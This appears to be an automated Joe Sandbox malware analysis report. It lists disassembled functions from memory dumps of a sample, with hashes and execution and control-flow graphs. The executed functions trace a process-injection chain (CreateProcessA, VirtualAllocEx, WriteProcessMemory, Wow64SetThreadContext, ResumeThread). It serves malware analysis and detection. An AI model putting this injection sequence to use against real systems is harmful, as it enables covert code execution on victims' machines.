                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                    • API String ID: 0-3723351465
                                                                    • Opcode ID: 1761e85f4e4de71fc016c99b94916aa5470f13fccc451c7ea79bcb3c80fe9c6a
                                                                    • Instruction ID: 3729f4994fccbdf89b0fa0e5ac9481bc71c8b2cfd3dbb0635550392ff023a8d2
                                                                    • Opcode Fuzzy Hash: 1761e85f4e4de71fc016c99b94916aa5470f13fccc451c7ea79bcb3c80fe9c6a
                                                                    • Instruction Fuzzy Hash: 00719130F102098FDB68DFA9DA90A6DB7F6FF84304F108569D405EB254DB759D46CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE83B8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: 08e3a2c3e8724bef7e02b7b84f7b2a1ab6a7eb789313d19ee68b6a81643140c1
                                                                    • Instruction ID: 13d789c920e100fef6c1bbf790ee3bfac1755fc639434389b7915c8d05ab47ba
                                                                    • Opcode Fuzzy Hash: 08e3a2c3e8724bef7e02b7b84f7b2a1ab6a7eb789313d19ee68b6a81643140c1
                                                                    • Instruction Fuzzy Hash: BAB12834B122098FDB54DFA9D5946AEB7B6FF84300F248829D406EB395DB75DD82CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE87D0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LR]q$LR]q$$]q$$]q
                                                                    • API String ID: 0-3527005858
                                                                    • Opcode ID: 6560b6b7d7d3ad871b084fd3b3138395ec96318ae75e90b5b44c04099665dc4d
                                                                    • Instruction ID: e20780d0ad1fb62c8827687f1ff72d4b1dd70667081c24b0ce4fc7bee36afc59
                                                                    • Opcode Fuzzy Hash: 6560b6b7d7d3ad871b084fd3b3138395ec96318ae75e90b5b44c04099665dc4d
                                                                    • Instruction Fuzzy Hash: AE51B130B012069FDB59DF69D954A6AB7F6FF84300F10856DD4069B3A5DB34EC41CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:15.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:174
                                                                    Total number of Limit Nodes:6
                                                                    execution_graph 18375 663b580 18376 663b740 18375->18376 18379 663b5a6 18375->18379 18377 663b70b 18377->18377 18379->18377 18380 6639088 18379->18380 18381 663b800 PostMessageW 18380->18381 18382 663b86c 18381->18382 18382->18379 18182 6637a27 18184 6637a81 18182->18184 18183 6637c6c 18184->18183 18188 663a306 18184->18188 18208 663a298 18184->18208 18227 663a2a8 18184->18227 18189 663a294 18188->18189 18190 663a309 18188->18190 18191 663a2e6 18189->18191 18246 663ad83 18189->18246 18251 663abbe 18189->18251 18256 663aa90 18189->18256 18263 663aad1 18189->18263 18267 663a7d2 18189->18267 18271 663a7f3 18189->18271 18278 663aeec 18189->18278 18283 663b16d 18189->18283 18289 663a5c8 18189->18289 18295 663aaab 18189->18295 18300 663a88b 18189->18300 18305 663ad06 18189->18305 18309 663ae87 18189->18309 18313 663afe0 18189->18313 18318 663a920 18189->18318 18326 663a9c1 18189->18326 18190->18183 18191->18183 18209 663a2a4 18208->18209 18210 663ad83 2 API calls 18209->18210 18211 663a9c1 2 API calls 18209->18211 18212 663a920 4 API calls 18209->18212 18213 663afe0 2 API calls 18209->18213 18214 663ae87 2 API calls 18209->18214 18215 663ad06 2 API calls 18209->18215 18216 663a88b 3 API calls 18209->18216 18217 663aaab 2 API calls 18209->18217 18218 663a5c8 2 API calls 18209->18218 18219 663b16d 2 API calls 18209->18219 18220 663a2e6 18209->18220 18221 663aeec 2 API calls 18209->18221 18222 663a7f3 4 API calls 18209->18222 18223 663a7d2 2 API calls 18209->18223 18224 663aad1 2 API calls 18209->18224 18225 663aa90 3 API calls 18209->18225 18226 663abbe 2 API calls 18209->18226 18210->18220 18211->18220 18212->18220 18213->18220 18214->18220 18215->18220 18216->18220 18217->18220 18218->18220 18219->18220 18220->18183 18221->18220 18222->18220 18223->18220 18224->18220 18225->18220 18226->18220 18228 663a2c2 18227->18228 18229 663ad83 2 API calls 18228->18229 18230 663a9c1 2 API calls 18228->18230 18231 663a920 4 API calls 18228->18231 18232 663afe0 2 API calls 18228->18232 18233 663ae87 2 API calls 18228->18233 18234 663ad06 2 API calls 18228->18234 18235 663a88b 3 API calls 18228->18235 18236 663aaab 2 API calls 18228->18236 18237 663a5c8 2 API calls 18228->18237 18238 663b16d 2 API calls 18228->18238 18239 663a2e6 18228->18239 18240 663aeec 2 API calls 18228->18240 18241 663a7f3 4 API calls 18228->18241 18242 663a7d2 2 API calls 18228->18242 18243 663aad1 2 API calls 18228->18243 18244 663aa90 3 API calls 18228->18244 18245 663abbe 2 API calls 18228->18245 18229->18239 18230->18239 18231->18239 18232->18239 18233->18239 18234->18239 18235->18239 18236->18239 18237->18239 18238->18239 18239->18183 18240->18239 18241->18239 18242->18239 18243->18239 18244->18239 18245->18239 18247 663ad88 18246->18247 18331 6637360 18247->18331 18335 6637358 18247->18335 18248 663b01c 18252 663abd9 18251->18252 18339 6637110 18252->18339 18343 6637118 18252->18343 18253 663acb0 18253->18191 18257 663aaa5 18256->18257 18258 663a9c0 18256->18258 18347 66371c8 18257->18347 18261 6637110 ResumeThread 18258->18261 18262 6637118 ResumeThread 18258->18262 18259 663acb0 18259->18191 18259->18259 18261->18259 18262->18259 18265 6637360 WriteProcessMemory 18263->18265 18266 6637358 WriteProcessMemory 18263->18266 18264 663aaf5 18265->18264 18266->18264 18268 663a7db 18267->18268 18351 6637450 18268->18351 18355 663744c 18268->18355 18359 66372a0 18271->18359 18363 6637298 18271->18363 18272 663a811 18276 6637360 WriteProcessMemory 18272->18276 18277 6637358 WriteProcessMemory 18272->18277 18273 663b01c 18276->18273 18277->18273 18279 663aef2 18278->18279 18281 6637360 WriteProcessMemory 18279->18281 18282 6637358 WriteProcessMemory 18279->18282 18280 663b01c 18281->18280 18282->18280 18285 663a6c5 18283->18285 18284 663b20a 18284->18191 18285->18284 18367 66375e8 18285->18367 18371 66375e0 18285->18371 18291 663a5cc 18289->18291 18290 663b20a 18290->18191 18291->18290 18293 66375e0 CreateProcessA 18291->18293 18294 66375e8 CreateProcessA 18291->18294 18292 663a7b3 18292->18191 18293->18292 18294->18292 18296 663aab8 18295->18296 18298 6637110 ResumeThread 18296->18298 18299 6637118 ResumeThread 18296->18299 18297 663acb0 18297->18191 18297->18297 18298->18297 18299->18297 18302 66371c8 Wow64SetThreadContext 18300->18302 18301 663a7db 18303 6637450 ReadProcessMemory 18301->18303 18304 663744c ReadProcessMemory 18301->18304 18302->18301 18303->18301 18304->18301 18306 663a7db 18305->18306 18307 6637450 ReadProcessMemory 18306->18307 18308 663744c ReadProcessMemory 18306->18308 18307->18306 18308->18306 18310 663a7db 18309->18310 18311 6637450 ReadProcessMemory 18310->18311 18312 663744c ReadProcessMemory 18310->18312 18311->18310 18312->18310 18314 663afe6 18313->18314 18316 6637360 WriteProcessMemory 18314->18316 18317 6637358 WriteProcessMemory 18314->18317 18315 663b01c 18316->18315 18317->18315 18319 663a92d 18318->18319 18324 6637360 WriteProcessMemory 18319->18324 18325 6637358 WriteProcessMemory 18319->18325 18320 663b0fb 18321 663a7db 18321->18320 18322 6637450 ReadProcessMemory 18321->18322 18323 663744c ReadProcessMemory 18321->18323 18322->18321 18323->18321 18324->18321 18325->18321 18327 663a9db 18326->18327 18329 6637110 ResumeThread 18327->18329 18330 6637118 ResumeThread 18327->18330 18328 663acb0 18328->18191 18328->18328 18329->18328 18330->18328 18332 66373a8 WriteProcessMemory 18331->18332 18334 66373ff 18332->18334 18334->18248 18336 66373a8 WriteProcessMemory 18335->18336 18338 66373ff 18336->18338 18338->18248 18340 6637158 ResumeThread 18339->18340 18342 6637189 18340->18342 18342->18253 18344 6637158 ResumeThread 18343->18344 18346 6637189 18344->18346 18346->18253 18348 663720d Wow64SetThreadContext 18347->18348 18350 6637255 18348->18350 18350->18259 18352 663749b ReadProcessMemory 18351->18352 18354 66374df 18352->18354 18354->18268 18356 6637450 ReadProcessMemory 18355->18356 18358 66374df 18356->18358 18358->18268 18360 66372e0 VirtualAllocEx 18359->18360 18362 663731d 18360->18362 18362->18272 18364 66372a0 VirtualAllocEx 18363->18364 18366 663731d 18364->18366 18366->18272 18368 6637671 CreateProcessA 18367->18368 18370 6637833 18368->18370 18370->18370 18372 6637671 18371->18372 18372->18372 18373 66377d6 CreateProcessA 18372->18373 18374 6637833 18373->18374 18374->18374 18383 3124ba8 18384 3124bb1 18383->18384 18385 3124bb7 18384->18385 18387 3124ca0 18384->18387 18388 3124cc5 18387->18388 18392 3124db0 18388->18392 18396 3124da0 18388->18396 18393 3124dd7 18392->18393 18394 3124eb4 18393->18394 18400 31249dc 18393->18400 18398 3124db0 18396->18398 18397 3124eb4 18398->18397 18399 31249dc CreateActCtxA 18398->18399 18399->18397 18401 3125e40 CreateActCtxA 18400->18401 18403 3125f03 18401->18403

                                                                    Executed Functions

                                                                    Function 0663AB8C Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc2313e38393c3c374da0e4e7f2dee90b7afae7160e7aeb02920eaac091b7726
                                                                    • Instruction ID: 94dadf93759ffbc0df1c692d30d12e231d1313ad66f7cfb3faaa967190631b61
                                                                    • Opcode Fuzzy Hash: cc2313e38393c3c374da0e4e7f2dee90b7afae7160e7aeb02920eaac091b7726
                                                                    • Instruction Fuzzy Hash: 05D09E3894F228CFE780DF55DA949F8B7FDAB1F310F007059944AE3252D7309995EA84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 066375E0 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 602 66375e0-663767d 604 66376b6-66376d6 602->604 605 663767f-6637689 602->605 610 66376d8-66376e2 604->610 611 663770f-663773e 604->611 605->604 606 663768b-663768d 605->606 608 66376b0-66376b3 606->608 609 663768f-6637699 606->609 608->604 612 663769b 609->612 613 663769d-66376ac 609->613 610->611 614 66376e4-66376e6 610->614 621 6637740-663774a 611->621 622 6637777-6637831 CreateProcessA 611->622 612->613 613->613 615 66376ae 613->615 616 6637709-663770c 614->616 617 66376e8-66376f2 614->617 615->608 616->611 619 66376f6-6637705 617->619 620 66376f4 617->620 619->619 623 6637707 619->623 620->619 621->622 624 663774c-663774e 621->624 633 6637833-6637839 622->633 634 663783a-66378c0 622->634 623->616 626 6637771-6637774 624->626 627 6637750-663775a 624->627 626->622 628 663775e-663776d 627->628 629 663775c 627->629 628->628 630 663776f 628->630 629->628 630->626 633->634 644 66378c2-66378c6 634->644 645 66378d0-66378d4 634->645 644->645 648 66378c8 644->648 646 66378d6-66378da 645->646 647 66378e4-66378e8 645->647 646->647 649 66378dc 646->649 650 66378ea-66378ee 647->650 651 66378f8-66378fc 647->651 648->645 649->647 650->651 652 66378f0 650->652 653 663790e-6637915 651->653 654 66378fe-6637904 651->654 652->651 655 6637917-6637926 653->655 656 663792c 653->656 654->653 655->656 657 663792d 656->657 657->657
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0663781E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 805e7765865d35fdc904fbffbcf47fdeaa3c32bacf0bff8ad927adea2855e7f6
                                                                    • Instruction ID: 393e2cb73c34fadbad9e96981fa1ddec8dab99ded146391e6df7dcb6abc2d1d4
                                                                    • Opcode Fuzzy Hash: 805e7765865d35fdc904fbffbcf47fdeaa3c32bacf0bff8ad927adea2855e7f6
                                                                    • Instruction Fuzzy Hash: D7916BB1D00229DFDB64DF69C840BEEBBB2FF45310F14856AE818A7240DB749985CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 066375E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 659 66375e8-663767d 661 66376b6-66376d6 659->661 662 663767f-6637689 659->662 667 66376d8-66376e2 661->667 668 663770f-663773e 661->668 662->661 663 663768b-663768d 662->663 665 66376b0-66376b3 663->665 666 663768f-6637699 663->666 665->661 669 663769b 666->669 670 663769d-66376ac 666->670 667->668 671 66376e4-66376e6 667->671 678 6637740-663774a 668->678 679 6637777-6637831 CreateProcessA 668->679 669->670 670->670 672 66376ae 670->672 673 6637709-663770c 671->673 674 66376e8-66376f2 671->674 672->665 673->668 676 66376f6-6637705 674->676 677 66376f4 674->677 676->676 680 6637707 676->680 677->676 678->679 681 663774c-663774e 678->681 690 6637833-6637839 679->690 691 663783a-66378c0 679->691 680->673 683 6637771-6637774 681->683 684 6637750-663775a 681->684 683->679 685 663775e-663776d 684->685 686 663775c 684->686 685->685 687 663776f 685->687 686->685 687->683 690->691 701 66378c2-66378c6 691->701 702 66378d0-66378d4 691->702 701->702 705 66378c8 701->705 703 66378d6-66378da 702->703 704 66378e4-66378e8 702->704 703->704 706 66378dc 703->706 707 66378ea-66378ee 704->707 708 66378f8-66378fc 704->708 705->702 706->704 707->708 709 66378f0 707->709 710 663790e-6637915 708->710 711 66378fe-6637904 708->711 709->708 712 6637917-6637926 710->712 713 663792c 710->713 711->710 712->713 714 663792d 713->714 714->714
                                                                    APIs
                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0663781E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 06d0a8f473b86be98beda980745af9c12518d555ee23e6d4308ed0d77c473a77
                                                                    • Instruction ID: 961046c58d44f2d08ec09f908d99015ce67bd51a1f2bfd689ad940b1b23f3167
                                                                    • Opcode Fuzzy Hash: 06d0a8f473b86be98beda980745af9c12518d555ee23e6d4308ed0d77c473a77
                                                                    • Instruction Fuzzy Hash: 4C917BB1D00229DFDB64DF69C840BEEBBB2FF49310F14856AE818A7240DB749985CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 031249DC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 824 31249dc-3125f01 CreateActCtxA 827 3125f03-3125f09 824->827 828 3125f0a-3125f64 824->828 827->828 835 3125f73-3125f77 828->835 836 3125f66-3125f69 828->836 837 3125f88 835->837 838 3125f79-3125f85 835->838 836->835 840 3125f89 837->840 838->837 840->840
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 03125EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2139255628.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3120000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 5ab5d17c6b1f7d4980f50c2ed1a000f83168f8059fbb9e507f2fde19fc997cc1
                                                                    • Instruction ID: e053a8a61bb40804ae8a1070f4d59e922dd186dfb52e334d2393f243350feee5
                                                                    • Opcode Fuzzy Hash: 5ab5d17c6b1f7d4980f50c2ed1a000f83168f8059fbb9e507f2fde19fc997cc1
                                                                    • Instruction Fuzzy Hash: 3B41E2B0C0062DCBDB24CFA9C884B9DFBB6BF49304F24806AD419AB255DB756945CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 03125E34 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 841 3125e34-3125f01 CreateActCtxA 843 3125f03-3125f09 841->843 844 3125f0a-3125f64 841->844 843->844 851 3125f73-3125f77 844->851 852 3125f66-3125f69 844->852 853 3125f88 851->853 854 3125f79-3125f85 851->854 852->851 856 3125f89 853->856 854->853 856->856
                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 03125EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2139255628.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3120000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 42b76eec3510475b9d6a61a9206b69c6fa5201249fe89dc6693629bcf7508bc8
                                                                    • Instruction ID: d08a9c43f904cc93f40aec403e77fae77ffa3ccffadcb52ef5787cd5326035ff
                                                                    • Opcode Fuzzy Hash: 42b76eec3510475b9d6a61a9206b69c6fa5201249fe89dc6693629bcf7508bc8
                                                                    • Instruction Fuzzy Hash: 9241EFB1C00629CFDB24CFA9C984B9DFBB2BF49304F24805AD418AB254DB755946CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637358 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 857 6637358-66373ae 859 66373b0-66373bc 857->859 860 66373be-66373fd WriteProcessMemory 857->860 859->860 862 6637406-6637436 860->862 863 66373ff-6637405 860->863 863->862
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066373F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 99bc8bb523f78fda6bf0cfdce04b25d118b1f040e7bf4136f122014119632ec7
                                                                    • Instruction ID: 0b7113708ff27da6c2fa4a87c65dacab24c67d3a3fbcb2eb378619d4cef722b6
                                                                    • Opcode Fuzzy Hash: 99bc8bb523f78fda6bf0cfdce04b25d118b1f040e7bf4136f122014119632ec7
                                                                    • Instruction Fuzzy Hash: 162135B5D002199FDB10CFA9C880BEEBBF5FF88310F10842AE919A7240C7789941CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0663B7F8 Relevance: 1.6, APIs: 1, Instructions: 69windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 877 663b7f8-663b7fa 878 663b7fd-663b86a PostMessageW 877->878 879 663b7fc 877->879 882 663b873-663b887 878->882 883 663b86c-663b872 878->883 879->878 880 663b7c1-663b7cf 879->880 884 663b7d1-663b7d7 880->884 885 663b7d8-663b7ec 880->885 883->882 884->885
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0663B85D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 271db4aae48d0356b279a9cb227e7e6a98dab87ca348c01e068096d03be389a5
                                                                    • Instruction ID: 2d5da5f64ba08d058d4065ec78975f76e6ad612620c5e3b43b269108a2cc46b4
                                                                    • Opcode Fuzzy Hash: 271db4aae48d0356b279a9cb227e7e6a98dab87ca348c01e068096d03be389a5
                                                                    • Instruction Fuzzy Hash: F22116B68002189EDB60DF99D849BDEBBF8EB58324F20845AD518A7610C379A544CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637360 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 867 6637360-66373ae 869 66373b0-66373bc 867->869 870 66373be-66373fd WriteProcessMemory 867->870 869->870 872 6637406-6637436 870->872 873 66373ff-6637405 870->873 873->872
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066373F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 4dc4e99d8117bdcb2c9eb595877c40b38bb118971b7fc4de9b92480a8e1cbf6e
                                                                    • Instruction ID: 4b65533f502464449967ccde8580b392b98472b9710a234901828ccf311befbb
                                                                    • Opcode Fuzzy Hash: 4dc4e99d8117bdcb2c9eb595877c40b38bb118971b7fc4de9b92480a8e1cbf6e
                                                                    • Instruction Fuzzy Hash: 3F21F6B59003599FDB10DFA9C885BEEBBF5FF48310F108429E919A7240C778A944CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0663744C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066374D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 9bf2c5cbae04bda019e1177fa0ec084ee728c8b7f56e3c569d48f51901582084
                                                                    • Instruction ID: 8d49ca1c60a806cd1273d92ce08a9a0ac70845ad6e8bed92d31eee3b398228c0
                                                                    • Opcode Fuzzy Hash: 9bf2c5cbae04bda019e1177fa0ec084ee728c8b7f56e3c569d48f51901582084
                                                                    • Instruction Fuzzy Hash: E72116B1C002599FDB10DFAAC881AEEFBF5FF48310F508429E519A7251C778A541CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637450 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066374D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 4fb060d4b0f9259c77a117e082f14eb660970b03065a5a85e1b0a8710dc84229
                                                                    • Instruction ID: 063ebda48f40a957b2c546a1f02bc1d77b74e59166cb0daf9854dbd29e01dae0
                                                                    • Opcode Fuzzy Hash: 4fb060d4b0f9259c77a117e082f14eb660970b03065a5a85e1b0a8710dc84229
                                                                    • Instruction Fuzzy Hash: B12128B1C003599FCB10DFAAC880AEEFBF5FF48310F508429E519A7240C778A540CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 066371C8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06637246
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: 06a476fcbbcd4eb1efe39522ef80da1068579b6732bb7ce53fe0cca23b88e693
                                                                    • Instruction ID: 4d8dcd2f95f5b9ac49d6d9941832b2450d0bc3427b9a7945642633333585c8a3
                                                                    • Opcode Fuzzy Hash: 06a476fcbbcd4eb1efe39522ef80da1068579b6732bb7ce53fe0cca23b88e693
                                                                    • Instruction Fuzzy Hash: EE2137B1D002098FDB50DFAAC585BEEBBF4EF88320F148429D519A7240CB789944CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06637298 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0663730E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a5e082bd5bc6ee734f1c33dbde813379797875c4ec3d3ef288b3560c3aff55e4
                                                                    • Instruction ID: 0319ea5d84e1d3d3ebd0006a7e10f06a92548c552572fd84d4024aeede31a8e4
                                                                    • Opcode Fuzzy Hash: a5e082bd5bc6ee734f1c33dbde813379797875c4ec3d3ef288b3560c3aff55e4
                                                                    • Instruction Fuzzy Hash: 6C115CB18002499FDB20DFAAC844ADFBFF5FF88320F148819E519A7250CB799940CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 066372A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0663730E
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2142874719.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_6630000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 8ba8884342e0a31d272ce9320e88fb609c1a9626d76cdb41014b245a705c9d09
                                                                    • Instruction ID: 1b8a9763b8ee32c6b34e003123fda801f38c05f0adb345479bad9007b128e8f1
                                                                    • Opcode Fuzzy Hash: 8ba8884342e0a31d272ce9320e88fb609c1a9626d76cdb41014b245a705c9d09
                                                                    • Instruction Fuzzy Hash: DD1129B18002499FDB10DFAAC844ADEBFF5EF48310F148419D519A7250C7799940CBA4
                                                                    Uniqueness

